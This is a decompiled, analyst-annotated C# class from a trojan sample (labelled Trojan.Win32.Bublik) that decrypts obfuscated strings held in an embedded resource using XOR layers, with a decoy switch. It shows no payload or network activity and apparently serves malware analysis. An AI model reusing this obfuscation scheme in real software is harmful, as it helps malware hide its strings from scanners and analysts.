// Decompiled with JetBrains decompiler
// Type:
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
/// <summary>
/// Obfuscator-generated string table. Callers pass an integer id to
/// <c>\u0002(int)</c> and get back a string that is stored, in transformed form,
/// inside the embedded manifest resource named " \u200B " (space, zero-width
/// space, space). Decoded strings are cached and interned.
/// </summary>
/// <remarks>
/// Analysis notes: the strings this class returns do not appear as literals in
/// this listing, so a plain string scan of the code will not show them; they
/// live in the resource blob. All identifiers are non-printable control
/// characters emitted by the decompiler as \uXXXX escapes. The byte transform
/// itself is delegated to <c>\u0006.\u0002</c>, which is not part of this listing.
/// </remarks>
internal static class \u0008
{
  // Cache of decoded strings keyed by the caller-supplied id. Pre-sized to 47,
  // the same value used below as the "everything decoded" threshold.
  private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(47);
  // Reader over the embedded resource; created lazily, closed and nulled once
  // the cache holds 47 entries.
  private static BinaryReader \u0003;
  // Shared byte blob read from the resource header when the first header value
  // is non-zero; passed as the first argument to \u0006.\u0002 (presumably key
  // material; the helper is not shown here).
  private static byte[] \u0005;
  // Second header value, read only when the first is zero. Used as the length
  // of a per-entry blob; -1 means the length is stored with each entry.
  private static short \u0008;
  // Set to false during initialisation and never set to true in this listing.
  // When true, the decoded text is discarded and a hex number is returned
  // instead. NOTE(review): looks like a tamper/decoy switch; confirm against
  // the rest of the assembly.
  private static bool \u0006;
  // Public key token of the executing assembly, or null when the assembly has
  // none. The decompiler header reports PublicKeyToken=null for this sample,
  // so this is presumably null at run time.
  private static byte[] \u000E;
  // True once 47 strings have been decoded; enables the lock-free lookup path.
  private static bool \u000F;

  /// <summary>
  /// Returns the string associated with <paramref name="_param0"/>, decoding it
  /// from the embedded resource on first use and caching the result.
  /// </summary>
  /// <param name="_param0">
  /// Obfuscated id. XOR-ing it with -665677667 gives the byte offset of the
  /// entry inside the resource stream.
  /// </param>
  /// <returns>
  /// The interned string. On the fast path (all 47 entries already cached) an
  /// unknown id yields null, because the TryGetValue result is ignored.
  /// </returns>
  // NoInlining keeps this method as its own frame; presumably so that
  // Assembly.GetExecutingAssembly() below resolves to this assembly.
  [MethodImpl(MethodImplOptions.NoInlining)]
  internal static string \u0002(int _param0)
  {
    // Fast path: once every string is cached, read the dictionary without locking.
    if (\u0008.\u000F)
    {
      string str;
      \u0008.\u0002.TryGetValue(_param0, out str);
      return str;
    }
    // Slow path: the cache dictionary doubles as the lock object.
    lock (\u0008.\u0002)
    {
      string str1;
      if (\u0008.\u0002.TryGetValue(_param0, out str1))
        return str1;
      // One-time initialisation: open the resource and parse its header.
      if (\u0008.\u0003 == null)
      {
        Assembly executingAssembly = Assembly.GetExecutingAssembly();
        \u0008.\u0006 = false;
        // No null check: a missing resource makes the BinaryReader constructor throw.
        \u0008.\u0003 = new BinaryReader(executingAssembly.GetManifestResourceStream(" \u200B "));
        // Header word 1 (XOR -18656): length of the shared blob, or 0 for "no shared blob".
        short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ -18656);
        if (count == (short) 0)
          // Header word 2 (XOR 30416): fixed per-entry blob length, or -1.
          \u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ 30416);
        else
          \u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
        // Normalise "no token" (empty array) to null so later checks are a simple null test.
        \u0008.\u000E = executingAssembly.GetName().GetPublicKeyToken();
        if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
          \u0008.\u000E = (byte[]) null;
      }
      // Recover the entry's stream offset from the id and seek to it.
      int num1 = _param0 ^ -665677667;
      \u0008.\u0003.BaseStream.Position = (long) num1;
      // Pick the blob handed to the helper: the shared one, or one stored with the entry.
      byte[] numArray;
      if (\u0008.\u0005 != null)
      {
        numArray = \u0008.\u0005;
      }
      else
      {
        // Per-entry length is either the fixed header value or an Int16 masked
        // with -31071 and the entry offset; a length of 0 means no blob (null).
        short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -31071 ^ num1);
        numArray = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
      }
      // Payload length, masked with the entry offset and 982698659. The sign
      // bit is a flag selecting the single-byte character path below; it is
      // cleared before the value is used as a byte count.
      int count1 = \u0008.\u0003.ReadInt32() ^ num1 ^ 982698659;
      bool flag = (count1 & int.MinValue) != 0;
      if (flag)
        count1 &= int.MaxValue;
      // Transform the payload with the external helper (not in this listing).
      byte[] bytes = \u0006.\u0002(numArray, \u0008.\u0003.ReadBytes(count1));
      // Extra XOR layer, applied when "token present" differs from \u0006.
      // With \u0006 false this runs only for an assembly that has a public key token.
      if (\u0008.\u000E != null != \u0008.\u0006)
      {
        // Assumes the helper returned at least count1 bytes; TODO confirm.
        for (int index = 0; index < count1; ++index)
        {
          // Token bytes are used cyclically (index & 7), each rotated left by
          // 3 bits within a byte before being XOR-ed into the payload.
          byte num2 = \u0008.\u000E[index & 7];
          byte num3 = (byte) ((int) num2 << 3 | (int) num2 >> 5);
          bytes[index] = (byte) ((uint) bytes[index] ^ (uint) num3);
        }
      }
      string str2;
      if (flag && !\u0008.\u0006)
      {
        // Flagged entries: each byte is widened to one char.
        char[] chArray = new char[count1];
        for (int index = 0; index < count1; ++index)
          chArray[index] = (char) bytes[index];
        str2 = new string(chArray);
      }
      else
        // Unflagged entries are decoded as UTF-16 (Encoding.Unicode).
        str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
      // Decoy path: replace the text with the hex form of (_param0 + count1) ^ 936568.
      // Unreachable in this listing because \u0006 is only ever assigned false.
      if (\u0008.\u0006)
        str2 = (_param0 + count1 ^ 936568).ToString("X");
      string str3 = string.Intern(str2);
      \u0008.\u0002.Add(_param0, str3);
      // After the 47th distinct string, release the reader and the blob/token
      // references and switch to the lock-free path.
      if (\u0008.\u0002.Count == 47)
      {
        \u0008.\u0003.Close();
        \u0008.\u0003 = (BinaryReader) null;
        \u0008.\u0005 = \u0008.\u000E = (byte[]) null;
        \u0008.\u000F = true;
      }
      return str3;
    }
  }
}